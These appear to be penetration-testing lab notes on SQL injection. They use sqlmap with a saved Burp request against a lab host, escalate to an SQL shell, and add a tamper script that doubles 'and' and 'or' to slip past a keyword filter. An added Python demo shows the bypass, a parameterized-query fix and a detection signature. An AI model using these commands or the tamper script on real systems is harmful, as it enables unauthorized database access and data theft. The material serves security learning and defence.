SQL Injection

sqlmap + Burp Suite

Save the request from Burp to a file and add * after the value of the parameter you want sqlmap to inject into:

POST /Controllers/Handlers/SearchHandler.php HTTP/1.1
Host: 83.136.254.199:49767
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Transfer-Encoding: chunked

search=6*
0

Then run the following command:

sqlmap -r request_file --level 3 --risk 3

If the injection succeeds, open an SQL shell:

sqlmap -r request_file --sql-shell

Creating Custom Tamper Scripts

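Create a new Python file, bypass.py, and add the following code:

#!/usr/bin/env python

# Ordering hint sqlmap uses when several tamper scripts are loaded
__priority__ = 1

def dependencies():
    # No DBMS- or version-specific requirements to declare
    pass

def tamper(payload: str, **kwargs):
    # Guard against an empty or None payload
    if not payload:
        return payload
    # Nest each keyword inside itself ("and" -> "aandnd", "or" -> "oorr").
    # lower() lowercases the whole payload, string literals included.
    modified_payload = payload.lower().replace("and", "aandnd").replace("or", "oorr")
    return modified_payload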

Also create an empty file __init__.py in the same directory:

touch __init__.py

Then run the following command:

sqlmap -r request_file --tamper bypass.py --level 3 --risk 3
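
Why the doubled keywords get through, and what closes the hole, as an added example that is not part of the original page. It assumes the application deletes the keywords and/or from the search value in a single pass before concatenating it into the query; naive_filter, search_vulnerable, search_parameterized and the items table are hypothetical and constructed for the demonstration.

```python
import re
import sqlite3


def naive_filter(value: str) -> str:
    # Assumed server-side filter: ONE non-recursive pass deleting the keywords.
    return re.sub(r"and|or", "", value, flags=re.IGNORECASE)


def make_db() -> sqlite3.Connection:
    # Constructed sample data, in memory only.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    db.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [(6, "widget"), (7, "gadget"), (8, "internal")],
    )
    return db


def search_vulnerable(db: sqlite3.Connection, term: str) -> list:
    # Weak pattern: blacklist the input, then build the SQL by concatenation.
    query = "SELECT name FROM items WHERE id = " + naive_filter(term)
    return [row[0] for row in db.execute(query)]


def search_parameterized(db: sqlite3.Connection, term: str) -> list:
    # Hardened pattern: validate the expected type, then bind the value.
    # The input never becomes part of the SQL text, so no keyword list is needed.
    if not re.fullmatch(r"[0-9]+", term):
        return []
    rows = db.execute("SELECT name FROM items WHERE id = ?", (int(term),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    tampered = "6 oorr 1=1"  # constructed value in the shape bypass.py produces
    print("after filter :", repr(naive_filter(tampered)))
    print("vulnerable   :", search_vulnerable(db, tampered))
    print("parameterized:", search_parameterized(db, tampered))
```

On the detection side, doubled keywords such as oorr or aandnd in request parameters are a useful signature for WAF or log rules, since normal search input rarely contains them.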